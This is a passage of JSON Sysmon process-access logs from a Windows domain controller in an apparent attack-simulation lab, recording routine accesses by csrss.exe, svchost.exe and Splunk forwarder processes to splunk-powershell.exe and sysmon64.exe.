Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-10B3-5F25-0000-00100EF20400}","TargetProcessId":"4732","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2882,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.139\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10B3-5F25-0000-00100EF20400}\r\nTargetProcessId: 4732\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.139","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10B3-5F25-0000-00100EF20400}","TargetProcessId":"4732","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2883,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.139\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.139","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2884,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.139\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.139","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2885,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.139\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.139","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2886,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.139\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.139","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2887,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.139\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.139","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2888,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.139\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.139","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2889,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.139\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.139","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
